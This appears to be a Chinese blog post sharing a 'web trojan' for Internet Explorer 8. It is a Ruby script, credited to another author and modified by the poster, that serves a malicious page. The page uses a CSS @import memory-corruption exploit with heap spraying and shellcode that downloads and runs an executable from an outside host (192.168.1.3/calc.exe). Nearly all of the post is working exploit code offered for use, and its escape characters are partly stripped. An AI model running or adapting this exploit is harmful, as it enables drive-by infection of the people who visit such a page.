好用的过ie8的网马,重在技术研究

  原内容不是我发明的,我只是改了一下,改成下载的了

  #!/usr/bin/env ruby

  # Author: Nephi Johnson (d0c_s4vage)

  require 'socket'

  def http_send(sock, data, opts={})

  defaults = {:code=>"200", :message=>"OK", :type=>"text/html"}

  opts = defaults.merge(opts)

  code = opts[:code]

  message = opts[:message]

  type = opts[:type]

  to_send = "HTTP/1.1 #{code} #{message}
" +

  "Date: Sat, 11 Dec 2010 14:20:23 GMT
" +

  "Cache-Control: no-cache
" +

  "Content-Type: #{type}
" +

  "Pragma: no-cache
" +

  "Content-Length: #{data.length}

" +

  "#{data}"

  puts "[+] Sending:"

  to_send.split("
").each do |line|

  puts "    #{line}"

  end

  sock.write(to_send) rescue return false

  return true

  end

  def sock_read(sock, out_str, timeout=5)

  begin

  if Kernel.select([sock],[],[],timeout)

  out_str.replace(sock.recv(1024))

  puts "[+] Received:"

  out_str.split("
").each do |line|

  puts "    #{line}"

  end

  else

  sock.close

  return false

  end

  rescue Exception => ex

  return false

  end

  end

  def to_uni(str)

  res = ""

  str.each_byte do |b|

  res << "x00#{b.chr}"

  end

  res

  end

  @css_name = "x00sx03sx00sx03sx00sx03sx00sx03s"

  @html_name = "testxxx.html"

  placeholder = "a" * (@css_name.length/2)

  @html = <<-HTML

  <script>

  function dup_str(str, length) {

  var res = str;

  while(res.length < length) {

  res += res;

  }

  res = res.substr(res.length – length);

  return res;

  }

  function to_bin(str) {

  var res = "";

  while(str.length > 0) {

  var first = str.substr(0, 2);

  var second = str.substr(2, 2);

  res += "%u" + second + first;

  str = (str.length > 4) ? str.substr(4) : "";

  }

  return unescape(res);

  }

  // first heap spray

  var base = dup_str(to_bin("0c0c0c0900000008000000730073030100000000010000730073030c"), 512+6);

  var arr = []

  for(var i = 0; i < 60000; i++) {

  arr[i] = ["" + base].join("");

  }

  // second heap spray w/ shellcode

  var nops = dup_str(to_bin("0c0c0c0c"), 4096+6);

  // windows/exec – 200 bytes

  // http://www.myhack58.com

  // EXITFUNC=process, url=http://192.168.1.3/calc.exe

  var shellcode = unescape("%u10eb%u4a5a%uc933%ub966%u013c%u3480%u990a%ufae2%u05eb%uebe8%uffff%u70ff%u994c%u9999%ufdc3%ua938%u9999%u1299%u95d9%ue912%u3485%ud912%u1291%u1241%ua5ea%ued12%ue187%u6a9a%ue712%u9ab9%u1262%u8dd7%u74aa%ucecf%u12c8%u9aa6%u1262%uf36b%uc097%u3f6a%u91ed%uc6c0%u5e1a%udc9d%u707b%uc6c0%u12c7%u1254%ubddf%u5a9a%u7848%u589a%u50aa%u12ff%u1291%u85df%u5a9a%u7858%u9a9b%u1258%u9a99%u125a%u1263%u1a6e%u975f%u4912%u9df3%u71c0%u99c9%u9999%u5f1a%ucb94%u66cf%u65ce%u12c3%uf341%uc098%ua471%u9999%u1a99%u8a5f%udfcf%ua719%uec19%u1963%u19af%u1ac7%ub975%u4512%ub9f3%u66ca%u75ce%u9d5e%uc59a%ub7f8%u5efc%u9add%ue19d%u99fc%uaa99%uc959%ucac9%uc9cf%uce66%u1265%uc945%u66ca%u69ce%u66c9%u6dce%u59aa%u1c35%uec59%uc860%ucfcb%u66ca%uc34b%u32c0%u777b%u59aa%u715a%u66bf%u6666%ufcde%uc9ed%uf6eb%ud8fa%ufdfd%ufceb%ueaea%ude99%uedfc%ue0ca%uedea%uf4fc%uf0dd%ufceb%uedfa%uebf6%ud8e0%uce99%uf7f0%ue1dc%ufafc%udc99%uf0e1%ucded%uebf1%uf8fc%u99fd%uf6d5%ufdf8%uf0d5%uebfb%uebf8%ud8e0%uec99%uf5eb%uf6f4%u99f7%ucbcc%uddd5%ueef6%uf5f7%uf8f6%ucdfd%udff6%uf5f0%ud8fc%u6899%u7474%u3a70%u2f2f%u3931%u2e32%u3631%u2e38%u2e31%u2f33%u6163%u636c%u652e%u6578%u4180");

  var arr2 = [];

  for(var i = 0; i < 30000; i++) {

  arr2[i] = [nops + shellcode].join("");

  }

  // write the link to the stylesheet

  var link = document.createElement("link");

  link.setAttribute("rel", "Stylesheet");

  link.setAttribute("type", "text/css");

  link.setAttribute("href", "#{placeholder}")

  document.getElementsByTagName("head")[0].appendChild(link);

  </script>

  HTML

  @html = "xfexff" + to_uni(@html)

  @html.gsub!(to_uni(placeholder), @css_name)

  # aFile = File.new("C:\\1.txt","wb")

  #      aFile.puts @html

  #aFile.close

  @css = <<-CSS

  @import url("#{placeholder}");

  @import url("#{placeholder}");

  @import url("#{placeholder}");

  @import url("#{placeholder}");

  CSS

  @css = "xfexff" + to_uni(@css)

  @css.gsub!(to_uni(placeholder), @css_name)

  @index = <<-INDEX

  <a href="#{@html_name}">#{@html_name}</a>

  INDEX

  TCPServer.open(55555) do |srv|

  while true

  cli = srv.accept

  req = ""

  html = ""

  css = ""

  index = ""

  next unless sock_read(cli, req, 5)

  while req.length > 0

  if req =~ /GET/

  if req =~ /GET.*#{Regexp.escape(@html_name)}/

  break unless http_send(cli, @html, :type=>"text/html")

  elsif req =~ /GET.*index/

  break unless http_send(cli, @index)

  elsif req =~ /GET.*#{Regexp.escape(@css_name)}/

  break unless http_send(cli, @css, :type=>"text/css")

  else

  break unless http_send(cli, @css, :type=>"text/css")

  end

  elsif req =~ /QUIT/

  exit()

  end

  req = ""

  next unless sock_read(cli, req, 5)

  end

  cli.close rescue next

  end

  end

 

发表评论

邮箱地址不会被公开。 必填项已用*标注